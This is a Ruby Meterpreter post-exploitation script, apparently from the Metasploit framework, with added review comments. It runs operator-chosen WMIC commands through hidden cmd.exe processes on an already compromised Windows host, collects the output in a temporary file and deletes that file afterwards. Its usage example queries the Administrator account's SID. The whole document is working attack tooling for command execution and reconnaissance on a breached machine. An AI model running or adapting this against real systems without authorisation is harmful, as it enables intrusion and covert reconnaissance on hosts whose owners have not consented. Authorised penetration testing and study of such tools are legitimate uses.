# $Id$
#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
# and Windows XP and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
# Version: 0.1
################## Variable Declarations ##################
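session = client

# Target system information. Collected for parity with the original script but
# not used by any of the functions below.
wininfo = client.sys.config.sysinfo

# Setting Arguments
#
# Each entry: switch => [ takes_argument?, help text ].
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-c" => [ true,  "Command to execute. The command must be enclosed in double quotes."],
  "-f" => [ true,  "File where to save the output of the command."],
  "-s" => [ true,  "Text file with list of commands, one per line."]
)

#Setting Argument variables
commands = []   # WMIC command strings gathered from -c and -s
script   = nil  # path of the -s command list file, once given
outfile  = nil  # local path of the -f output file, once given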
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in an array; returns the output as a string
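# Runs each WMIC command in +wmiccmds+ on the target through cmd.exe, letting
# wmic collect everything via its /append: switch into a single temporary file
# under %TEMP%, then reads that file back and removes it.
#
# session  - the Meterpreter client session to execute on.
# wmiccmds - Array of WMIC argument strings (e.g. "useraccount get name,sid");
#            nil is treated as an empty list.
#
# Returns the raw bytes read from the output file ("" if nothing could be read).
# Errors are reported with print_status rather than raised, so cleanup of the
# temp file always runs.
#
# The command strings are interpolated straight into a cmd.exe command line.
# That is the point of the script (the operator runs arbitrary WMIC queries on
# an already compromised host), but it means cmd.exe metacharacters inside a
# command are interpreted by cmd.exe, not by wmic.
def wmicexec(session,wmiccmds= nil)
  tmpout = ''
  wmiccmds = Array(wmiccmds)
  wmicfl = nil

  # WMIC queries can be slow on large inventories; widen the session timeout
  # for the duration of this call and put the previous value back afterwards
  # instead of leaving it changed for the rest of the session.
  old_timeout = session.response_timeout
  session.response_timeout = 120

  begin
    tmp = session.fs.file.expand_path("%TEMP%")
    # Output goes to a randomly named file in %TEMP%. Note wmic /append:
    # appends to an existing file, so a name collision with a stale file from
    # an earlier run would mix old output into this one; the 5-digit name
    # space is kept from the original scheme.
    wmicfl = tmp + "\\" + sprintf("%.5d", rand(100000))
    print_status("Writing WMIC output to #{wmicfl}")

    wmiccmds.each do |wmi|
      print_status "running command wmic #{wmi}"
      # The /append: path is quoted: %TEMP% on XP/2003 can contain spaces,
      # which would otherwise truncate the argument.
      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:\"#{wmicfl}\" #{wmi}", nil, {'Hidden' => true})

      # Wait for the process we launched to exit before issuing the next
      # command. cmd.exe /c only returns once wmic.exe has finished, so the pid
      # of the cmd.exe is what to watch. Matching on our own pid (rather than
      # any process named wmic.exe) is not confused by unrelated wmic instances
      # on the host, and the wait is bounded so a wmic that never exits - e.g.
      # an empty command dropping into wmic's interactive prompt - cannot hang
      # the script forever.
      deadline = Time.now + 120
      timed_out = false
      while session.sys.process.get_processes().any? { |p| p['pid'] == r.pid }
        if Time.now > deadline
          timed_out = true
          break
        end
        sleep(0.5)
        print_line "."
      end
      print_status("Timed out waiting for wmic to finish; output may be incomplete") if timed_out
      r.close
    end

    # Read back whatever wmic appended, as raw bytes. NOTE(review): on the
    # targeted Windows versions wmic's /append: output appears to be UTF-16LE,
    # so the result may contain NUL bytes between characters - left untouched
    # here so -f saves exactly what wmic wrote; confirm on a live target.
    wmioutfile = session.fs.file.new(wmicfl, "rb")
    begin
      until wmioutfile.eof?
        chunk = wmioutfile.read
        tmpout << chunk if chunk
      end
    ensure
      wmioutfile.close
    end
  rescue ::StandardError => e
    # Best effort: report and fall through so the temp file is still removed.
    print_status("Error running WMIC commands: #{e.class} #{e}")
  ensure
    session.response_timeout = old_timeout
  end

  # Remove the output file from the target through the Meterpreter file API
  # rather than spawning "cmd.exe /c del": no extra process, and a failure is
  # visible instead of silently ignored.
  if wmicfl
    begin
      session.fs.file.rm(wmicfl)
    rescue ::StandardError => e
      print_status("Could not remove #{wmicfl}: #{e.class} #{e}")
    end
  end

  tmpout
end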
# Function for writing results of other functions to a file
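# Appends +data2wrt+ to the local file +file2wrt+, one line of output per line
# of data.
#
# file2wrt - path on the attacker's machine (the -f argument).
# data2wrt - String; each line is written with puts, so a final line without a
#            trailing newline still gets one.
#
# Returns nil. The block form of File.open guarantees the handle is closed
# even if a write raises (the non-block form left it open on error).
def filewrt(file2wrt, data2wrt)
  ::File.open(file2wrt, "a") do |output|
    data2wrt.each_line do |d|
      output.puts(d)
    end
  end
  nil
end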
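# Prints the script's help text.
#
# Everything goes through print_line so it reaches the session's output
# channel; puts writes to the framework process's stdout, which is not the
# operator's console when running under msfrpcd or a GUI front end.
def usage
  print_line("Windows WMIC Command Execution Meterpreter Script ")
  print_line(@@exec_opts.usage)
  print_line("USAGE:")
  print_line("run wmic -c \"WMIC Command Argument\"\n")
  print_line("NOTE:")
  print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
  print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
  print_line("Example:")
  print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
end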
################## Main ##################
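# Parse the script arguments into +commands+, +script+ and +outfile+ (all
# defined above). Argument errors are raised as RuntimeError, which is how a
# Meterpreter script aborts and reports back to the console.
@@exec_opts.parse(args) { |opt, idx, val|
  case opt
  when "-c"
    raise "-c requires an argument" unless val
    # "/" separates several WMIC commands given in one -c value. This also
    # means a single command containing a "/" switch (e.g. /format:list) is
    # split apart - put such commands in a -s file instead.
    commands.concat(val.split("/"))
  when "-s"
    raise "-s requires an argument" unless val
    script = val
    raise "Command List File does not exist!" unless ::File.exist?(script)
    # File.foreach closes the file when done. Blank lines are skipped: an
    # empty WMIC command line drops wmic.exe into its interactive prompt,
    # which never exits on its own.
    ::File.foreach(script) do |line|
      cmd = line.chomp
      commands << cmd unless cmd.strip.empty?
    end
  when "-f"
    raise "-f requires an argument" unless val
    outfile = val
  when "-h"
    usage
    raise RuntimeError, "Usage"
  else
    raise RuntimeError, "Unknown option: #{opt}"
  end
}

# Checked once after parsing rather than after every option, so that
# "-f out.txt -c <cmd>" is not rejected merely because -f came first, and so
# that running with no arguments at all prints usage instead of executing an
# empty command list against the target.
if commands.empty?
  usage
  raise RuntimeError, "Empty command list"
end

if outfile
  print_status("Saving output of WMIC to #{outfile}")
  filewrt(outfile, wmicexec(session, commands))
else
  print_status wmicexec(session, commands)
end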